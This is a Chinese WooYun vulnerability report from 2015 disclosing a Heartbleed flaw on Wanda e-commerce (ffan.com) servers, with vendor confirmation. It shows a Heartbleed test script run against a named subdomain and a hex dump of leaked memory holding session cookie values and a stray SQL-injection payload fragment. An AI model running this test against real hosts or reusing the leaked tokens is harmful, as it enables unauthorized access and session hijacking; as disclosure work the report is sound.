当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0104638

漏洞标题:万达电商通用服务配置不当一枚

相关厂商:万达电商

漏洞作者: 爱上平顶山

提交时间:2015-03-31 15:09

修复时间:2015-05-15 15:22

公开时间:2015-05-15 15:22

漏洞类型:重要敏感信息泄露

危害等级:高

自评Rank:20

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-03-31: 细节已通知厂商并且等待厂商处理中
2015-03-31: 厂商已经确认,细节仅向厂商公开
2015-04-10: 细节向核心白帽子及相关领域专家公开
2015-04-20: 细节向普通白帽子公开
2015-04-30: 细节向实习白帽子公开
2015-05-15: 细节向公众公开

简要描述:

...

详细说明:

万达电商 ffan.com的所有子域名
www.ffan.com
Heartbleed 漏洞
D:\Python27>python.exe ssltest.py -p "443" jf.ffan.com

Connecting...
Sending Client Hello...
Waiting for Server Hello...
... received message: type = 22, ver = 0302, length = 66
... received message: type = 22, ver = 0302, length = 804
... received message: type = 22, ver = 0302, length = 331
... received message: type = 22, ver = 0302, length = 4
Sending heartbeat request...
... received message: type = 24, ver = 0302, length = 16384
Received heartbeat response:
0000: 02 40 00 2F 77 64 70 6F 69 6E 74 2F 6A 61 76 61 .@./wdpoint/java
0010: 73 63 72 69 70 74 2F 35 66 39 39 65 63 37 32 34 script/5f99ec724
0020: 36 66 31 33 31 66 38 31 62 38 37 34 37 39 33 38 6f131f81b8747938
0030: 66 31 38 30 62 31 31 2F 77 64 70 6F 69 6E 74 2F f180b11/wdpoint/
0040: 70 61 67 65 73 2F 68 65 61 64 65 72 2E 6A 73 20 pages/header.js
0050: 48 54 54 50 2F 31 2E 31 0D 0A 41 63 63 65 70 74 HTTP/1.1..Accept
0060: 3A 20 2A 2F 2A 0D 0A 52 65 66 65 72 65 72 3A 20 : */*..Referer:
0070: 68 74 74 70 73 3A 2F 2F 6A 66 2E 66 66 61 6E 2E https://jf.ffan.
0080: 63 6F 6D 2F 64 65 74 61 69 6C 2F 69 6E 64 65 78 com/detail/index
0090: 2F 69 64 2F 32 37 30 0D 0A 41 63 63 65 70 74 2D /id/270..Accept-
00a0: 4C 61 6E 67 75 61 67 65 3A 20 7A 68 2D 63 6E 0D Language: zh-cn.
00b0: 0A 55 73 65 72 2D 41 67 65 6E 74 3A 20 4D 6F 7A .User-Agent: Moz
00c0: 69 6C 6C 61 2F 34 2E 30 20 28 63 6F 6D 70 61 74 illa/4.0 (compat
00d0: 69 62 6C 65 3B 20 4D 53 49 45 20 38 2E 30 3B 20 ible; MSIE 8.0;
00e0: 57 69 6E 64 6F 77 73 20 4E 54 20 35 2E 31 3B 20 Windows NT 5.1;
00f0: 54 72 69 64 65 6E 74 2F 34 2E 30 3B 20 2E 4E 45 Trident/4.0; .NE
0100: 54 34 2E 30 43 3B 20 2E 4E 45 54 34 2E 30 45 3B T4.0C; .NET4.0E;
0110: 20 2E 4E 45 54 20 43 4C 52 20 32 2E 30 2E 35 30 .NET CLR 2.0.50
0120: 37 32 37 29 0D 0A 41 63 63 65 70 74 2D 45 6E 63 727)..Accept-Enc
0130: 6F 64 69 6E 67 3A 20 67 7A 69 70 2C 20 64 65 66 oding: gzip, def
0140: 6C 61 74 65 0D 0A 48 6F 73 74 3A 20 72 65 73 31 late..Host: res1
0150: 2E 66 66 61 6E 2E 63 6F 6D 0D 0A 43 6F 6E 6E 65 .ffan.com..Conne
0160: 63 74 69 6F 6E 3A 20 4B 65 65 70 2D 41 6C 69 76 ction: Keep-Aliv
0170: 65 0D 0A 43 6F 6F 6B 69 65 3A 20 53 45 53 53 49 e..Cookie: SESSI
0180: 4F 4E 49 44 3D 36 39 64 63 66 64 64 39 39 38 64 ONID=69dcfdd998d
0190: 34 34 38 63 65 38 63 63 31 65 62 64 31 65 66 36 448ce8cc1ebd1ef6
01a0: 64 30 30 61 35 3B 20 55 5F 55 49 44 3D 36 39 64 d00a5; U_UID=69d
01b0: 63 66 64 64 39 39 38 64 34 34 38 63 65 38 63 63 cfdd998d448ce8cc
01c0: 31 65 62 64 31 65 66 36 64 30 30 61 35 3B 20 43 1ebd1ef6d00a5; C
01d0: 49 54 59 5F 49 44 3D 31 31 30 31 30 30 0D 0A 0D ITY_ID=110100...
01e0: 0A 13 65 52 C8 1A B7 1F 31 DB C2 BB B3 68 4B 75 ..eR....1....hKu
01f0: 84 6F 5F 96 D7 02 02 02 2D 43 AF 29 D6 5B 0E 63 .o_.....-C.).[.c
0200: FD F2 50 AF A6 6D 66 64 39 DE 88 B5 DB 5B 6C C9 ..P..mfd9....[l.
0210: CB B3 B1 4F 80 4C 4C 25 32 43 4E 55 4C 4C 25 32 ...O.LL%2CNULL%2
0220: 43 4E 55 4C 4C 25 32 43 4E 55 4C 4C 25 32 43 4E CNULL%2CNULL%2CN
0230: 55 4C 4C 25 32 43 4E 55 4C 4C 25 32 43 4E 55 4C ULL%2CNULL%2CNUL
0240: 4C 25 32 43 4E 55 4C 4C 25 32 43 4E 55 4C 4C 25 L%2CNULL%2CNULL%
0250: 32 43 4E 55 4C 4C 2D 2D 25 32 30 26 73 74 6F 63 2CNULL--%20&stoc
0260: 6B 3D 33 30 30 26 67 6F 6F 64 73 5F 69 64 3D 31 k=300&goods_id=1
0270: E5 3B 93 B4 FD D0 58 48 5C 14 25 D3 A3 25 81 CA .;....XH\.%..%..
0280: FF B8 A4 F5 0B 0B 0B 0B 0B 0B 0B 0B 0B 0B 0B 0B ................
0290: 2A A1 E2 11 B5 39 4F 4A 40 AB 61 DD 10 9D CB 80 *....9OJ@.a.....
02a0: D8 CC DE 6D D1 78 74 08 0F 43 28 C1 F2 68 BD 06 ...m.xt..C(..h..
02b0: 3A 7B CB E0 36 6F 64 73 5F 69 64 3D 31 55 FC 45 :{..6ods_id=1U.E
02c0: 90 D3 BA CC 03 97 BC CD 01 89 EE CC A6 B7 2A A8 ..............*.
02d0: 20 0E 0E 0E 0E 0E 0E 0E 0E 0E 0E 0E 0E 0E 0E 0E ...............
02e0: A7 27 01 29 D3 E3 38 C9 C7 0A 73 1C 4C 83 4E C7 .'.)..8...s.L.N.
02f0: 37 7D 36 53 B4 5D A8 95 6A A9 A1 B5 8F 04 49 3C 7}6S.]..j.....I<
0300: 1F 25 E6 8C DE D9 99 45 3F D1 70 21 23 DC 57 42 .%.....E?.p!#.WB
0310: 6B 82 5F C6 9F 99 C4 A3 1D F7 66 F9 13 F4 C3 C8 k._.......f.....
0320: 56 5E 13 6C 19 52 2A 0B 86 84 C6 7E 5F 44 67 1F V^.l.R*....~_Dg.
0330: 9A C1 53 48 58 73 5F 69 64 3D 31 63 16 93 28 CE ..SHXs_id=1c..(.
0340: D9 B9 10 F0 B1 42 10 E1 BD 46 6B A0 98 11 CB 00 .....B...Fk.....
0350: 21 F2 C2 1B D4 10 38 E8 E9 11 70 6B 9C ED B4 19 !.....8...pk....
0360: 2D 2B 1A 25 4B CF 4F 77 3E EB 5D 69 D8 C3 C5 C9 -+.%K.Ow>.]i....
0370: C4 99 1B B0 00 F2 36 B2 C8 66 CB EA 0C FB 5B 50 ......6..f....[P


0.jpg


ok 不一一演示 自测.

漏洞证明:

···

修复方案:

···升级

版权声明:转载请注明来源 爱上平顶山@乌云


漏洞回应

厂商回应:

危害等级:高

漏洞Rank:12

确认时间:2015-03-31 15:20

厂商回复:

感谢爱上平顶山同学的关注与贡献!马上通知业务整改!

最新状态:

暂无